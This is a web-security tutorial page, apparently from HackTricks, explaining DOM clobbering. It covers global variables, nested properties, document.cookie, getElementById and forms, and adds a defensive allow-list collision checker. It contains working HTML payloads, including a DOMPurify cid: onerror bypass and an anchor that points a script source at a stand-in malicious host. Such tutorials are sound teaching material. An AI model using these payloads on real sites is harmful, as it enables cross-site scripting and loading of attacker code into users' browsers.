# Dom Clobbering
{{#include ../../banners/hacktricks-training.md}}
## **Basics**
It is possible to create **global variables inside the JS context** by using the **`id`** and **`name`** attributes of HTML tags.
```html
<form id="x"></form>
<script>
// the form is reachable both as document.x and as the global x
console.log(typeof document.x) //object
console.log(String(document.x)) //[object HTMLFormElement]
</script>
```
**Only** certain elements can use the **name attribute** to clobber globals; they are: `embed`, `form`, `iframe`, `image`, `img` and `object`.
Interestingly, when you use a **form element** to **clobber** a variable, you get the **`toString`** value of the element itself, `[object HTMLFormElement]`, but for an **anchor** the **`toString`** value is the anchor's **`href`**. Therefore, if you **clobber** with an **`a`** tag, you can **control** the **value** whenever it is used as a **string**:
```html
<a href="controlled string" id="x"></a>
<script>
// string coercion of an anchor yields its href
console.log(String(x)) //controlled string
</script>
```
### Arrays & Attributes
It is also possible to **clobber an array** and **object attributes**:
```html
<a id="x"></a>
<a id="x" name="y" href="controlled"></a>
<script>
// two elements with the same id turn x into an HTMLCollection
console.log(String(x[1])) //controlled
console.log(String(x.y)) //controlled
</script>
```
To clobber a **third-level attribute** (e.g. `x.y.z`), you need to use a **`form`**:
```html
<form id="x" name="y"><input id="z" value="controlled" /></form>
<form id="x"></form>
<script>
alert(x.y.z.value) //controlled
</script>
```
Clobbering more attributes is **harder but still possible**, using iframes:
```html
<iframe name="x" srcdoc="<a id=y href=controlled></a>"></iframe>
<style>
@import "https://google.com";
</style>
<script>
alert(x.y) //controlled
</script>
```
> [!WARNING]
> The style tag is used to give the **iframe enough time to render**. Without it you will get an alert of **undefined**.
To clobber even deeper attributes, you can use **iframes with HTML encoding** like this:
```html
<iframe
name="a"
srcdoc="<iframe srcdoc='<iframe name=c srcdoc=<a/id=d&amp;amp;#x20;name=e&amp;amp;#x20;href=\controlled&amp;amp;gt;<a&amp;amp;#x20;id=d&amp;amp;gt; name=d>' name=b>"></iframe>
<style>
@import "https://google.com";
</style>
<script>
alert(a.b.c.d.e) //controlled
</script>
```
### **Filter Bypass**
If a filter **iterates** over the **properties** of a node using something like `document.getElementById('x').attributes`, you can **clobber** the **`.attributes`** property and **break the filter**. Other DOM properties such as **`tagName`**, **`nodeName`** or **`parentNode`**, and more, are also **clobberable**.
```html
<form id="x"></form>
<form id="y">
<input name="nodeName" />
</form>
<script>
console.log(document.getElementById("x").nodeName) //FORM
// the input named nodeName shadows the real nodeName property of the form
console.log(String(document.getElementById("y").nodeName)) //[object HTMLInputElement]
</script>
```
## **Clobbering `window.someObject`**
In JavaScript it is common to find:
```javascript
var someObject = window.someObject || {}
```
Injecting HTML into the page makes it possible to replace `someObject` with a DOM node, which can introduce security vulnerabilities. For example, you can replace `someObject` with an anchor collection whose `url` member points to a malicious script:
```html
<a id=someObject><a id=someObject name=url href=//malicious-website.com/malicious.js></a>
```
In vulnerable code such as:
```html
<script>
window.onload = function () {
  let someObject = window.someObject || {}
  let script = document.createElement("script")
  script.src = someObject.url
  document.body.appendChild(script)
}
</script>
```
This technique abuses the script source to execute unwanted code.
**Trick**: **`DOMPurify`** allows the **`cid:`** protocol, which **does not URL-encode double quotes**. This means you can **inject an encoded double quote that will be decoded at runtime**. So, injecting something like **`<a id=defaultAvatar><a id=defaultAvatar name=avatar href="cid:&quot;onerror=alert(1)//">`** makes the HTML-encoded `&quot;` be **decoded at runtime** and **break out** of the attribute value, **creating** the **`onerror`** event.
Another technique uses the **`form`** element. Some client-side libraries inspect the attributes of a newly created form element in order to sanitize them. However, by adding an `input` with `id=attributes` inside the form, you effectively override the `attributes` property, preventing the sanitizer from reaching the real attributes.
You can [**find an example of this kind of clobbering in this CTF writeup**](iframes-in-xss-and-csp.md#iframes-in-sop-2).
## Clobbering the document object
According to the specification, it is possible to overwrite attributes of the document object using DOM Clobbering:
> The [Document](https://html.spec.whatwg.org/multipage/dom.html#document) interface [supports named properties](https://webidl.spec.whatwg.org/#dfn-support-named-properties). The [supported property names](https://webidl.spec.whatwg.org/#dfn-supported-property-names) of a [Document](https://html.spec.whatwg.org/multipage/dom.html#document) object document at any moment consist of the following, in [tree order](https://dom.spec.whatwg.org/#concept-tree-order) according to the element that contributed them, ignoring later duplicates, and with values from [id](https://html.spec.whatwg.org/multipage/dom.html#the-id-attribute) attributes coming before values from name attributes when the same element contributes both:
>
> - The value of the name content attribute for all [exposed](https://html.spec.whatwg.org/multipage/dom.html#exposed) [embed](https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-embed-element), [form](https://html.spec.whatwg.org/multipage/forms.html#the-form-element), [iframe](https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-iframe-element), [img](https://html.spec.whatwg.org/multipage/embedded-content.html#the-img-element), and [exposed](https://html.spec.whatwg.org/multipage/dom.html#exposed) [object](https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-object-element) elements that have a non-empty name content attribute and are [in a document tree](https://dom.spec.whatwg.org/#in-a-document-tree) with document as their [root](https://dom.spec.whatwg.org/#concept-tree-root);
> - The value of the [id](https://html.spec.whatwg.org/multipage/dom.html#the-id-attribute) content attribute for all [exposed](https://html.spec.whatwg.org/multipage/dom.html#exposed) [object](https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-object-element) elements that have a non-empty [id](https://html.spec.whatwg.org/multipage/dom.html#the-id-attribute) content attribute and are [in a document tree](https://dom.spec.whatwg.org/#in-a-document-tree) with document as their [root](https://dom.spec.whatwg.org/#concept-tree-root);
> - The value of the [id](https://html.spec.whatwg.org/multipage/dom.html#the-id-attribute) content attribute for all [img](https://html.spec.whatwg.org/multipage/embedded-content.html#the-img-element) elements that have both a non-empty [id](https://html.spec.whatwg.org/multipage/dom.html#the-id-attribute) content attribute and a non-empty name content attribute, and are [in a document tree](https://dom.spec.whatwg.org/#in-a-document-tree) with document as their [root](https://dom.spec.whatwg.org/#concept-tree-root).
Using this technique you can overwrite **commonly used values such as `document.cookie`, `document.body`, `document.children`**, and even methods of the Document interface such as `document.querySelector`.
```javascript
// browser console session; the value after each expression is what the console prints
document.write("<img name=cookie />")
document.cookie          // <img name="cookie">
typeof(document.cookie)  // 'object'
//Something more sanitizer friendly than an img tag
document.write("<form name=cookie><input id=toString></form>")
document.cookie          // HTMLCollection(2) [img, form, cookie: img]
typeof(document.cookie)  // 'object'
```
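As an added example (not code from the original page), the following models the named-property rules quoted above together with the `window` rules from the Basics section, so an allow-list of tags, ids and names that a sanitizer would let through can be checked for collisions with sensitive `document` and `window` members before it ships. Elements are plain `{tag, id, name}` objects assumed to be in the document tree in tree order, and "exposed" is assumed to hold for every element; the sample list is constructed here.

```javascript
// Tags whose `name` attribute creates a property on `window` (from the page's list above).
const NAME_CLOBBERS_WINDOW = new Set(["embed", "form", "iframe", "image", "img", "object"]);
// Tags whose `name` attribute creates a property on `document` (first spec bullet).
const NAME_CLOBBERS_DOCUMENT = new Set(["embed", "form", "iframe", "img", "object"]);

// Names that become properties of `window`: any element's id, plus the name of the
// tags above. Tree order is kept and later duplicates are ignored, as in the spec.
function windowNamedProperties(elements) {
  const names = [];
  for (const el of elements) {
    if (el.id) names.push(el.id);
    if (el.name && NAME_CLOBBERS_WINDOW.has(el.tag)) names.push(el.name);
  }
  return [...new Set(names)];
}

// Names that become properties of `document`, following the three quoted bullets:
// name of embed/form/iframe/img/object; id of object; id of img that also has a name.
function documentNamedProperties(elements) {
  const names = [];
  for (const el of elements) {
    const byId = Boolean(el.id) && (el.tag === "object" || (el.tag === "img" && Boolean(el.name)));
    const byName = Boolean(el.name) && NAME_CLOBBERS_DOCUMENT.has(el.tag);
    if (byId) names.push(el.id); // id values come before name values for the same element
    if (byName) names.push(el.name);
  }
  return [...new Set(names)];
}

// Report which of the watched member names would be shadowed by the given markup.
function findClobberCollisions(elements, watched) {
  const doc = new Set(documentNamedProperties(elements));
  const win = new Set(windowNamedProperties(elements));
  return {
    document: watched.filter((p) => doc.has(p)),
    window: watched.filter((p) => win.has(p)),
  };
}

// Constructed sample: the markup discussed on this page, as a sanitizer might see it.
const SAMPLE_ELEMENTS = [
  { tag: "img", name: "cookie" },
  { tag: "form", name: "cookie" },
  { tag: "input", id: "toString" },
  { tag: "a", id: "someObject" },
  { tag: "a", id: "someObject", name: "url" },
  { tag: "img", id: "body" },
];
const WATCHED_MEMBERS = ["cookie", "body", "querySelector", "someObject"];
console.log(JSON.stringify(findClobberCollisions(SAMPLE_ELEMENTS, WATCHED_MEMBERS)));
```

Any name reported here is one the sanitizer's allow-list should reject, or the consuming code should guard with an explicit type check (for example `instanceof Node`) instead of `window.x || {}`.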
## Writing after a clobbered element
The results of calls to **`document.getElementById()`** and **`document.querySelector()`** can be altered by injecting an `<html>` or `<body>` tag with the same id attribute. Here is how it can be done:
```html
<div style="display:none" id="cdnDomain" class="x">test</div>
<p>
<html id="cdnDomain" class="x">
clobbered
</html>
<script>
alert(document.getElementById("cdnDomain").innerText) // Clobbered
alert(document.querySelector(".x").innerText) // Clobbered
</script>
</p>
```
Furthermore, by using styles to hide these injected HTML/body tags, interference from other text in `innerText` can be prevented, which makes the attack more reliable:
```html
<div style="display:none" id="cdnDomain">test</div>
<p>existing text</p>
<html id="cdnDomain">
clobbered
</html>
<style>
p {
display: none;
}
</style>
<script>
alert(document.getElementById("cdnDomain").innerText) // Clobbered
</script>
```
Research into SVG found that the `<body>` tag can also be used effectively:
```html
<div style="display:none" id="cdnDomain">example.com</div>
<svg>
<body id="cdnDomain">
clobbered
</body>
</svg>
<script>
alert(document.getElementById("cdnDomain").innerText) // Clobbered
</script>
```
For the HTML tag to work inside SVG in browsers such as Chrome and Firefox, a `<foreignobject>` tag is required:
```html
<div style="display:none" id="cdnDomain">example.com</div>
<svg>
<foreignobject>
<html id="cdnDomain">
clobbered
</html>
</foreignobject>
</svg>
<script>
alert(document.getElementById("cdnDomain").innerText) // Clobbered
</script>
```
## Clobbering Forms
It is possible to add **new inputs to a form** by **specifying the `form` attribute** on certain tags. You can use this to **add new values to a form** and even add a **new submit button** (via clickjacking or some JS `.click()` code):
```html
<!--Add a new attribute and a new button to send-->
<textarea form="id-other-form" name="info">
";alert(1);//
</textarea>
<button form="id-other-form" type="submit" formaction="/edit" formmethod="post">
Click to send!
</button>
```
- For more information about the form attributes of the `button` element, [**check this**](https://www.w3schools.com/tags/tag_button.asp).
## References
- [https://portswigger.net/research/hijacking-service-workers-via-dom-clobbering](https://portswigger.net/research/hijacking-service-workers-via-dom-clobbering)
- [https://portswigger.net/web-security/dom-based/dom-clobbering](https://portswigger.net/web-security/dom-based/dom-clobbering)
- Heyes, Gareth. JavaScript for hackers: Learn to think like a hacker.
{{#include ../../banners/hacktricks-training.md}}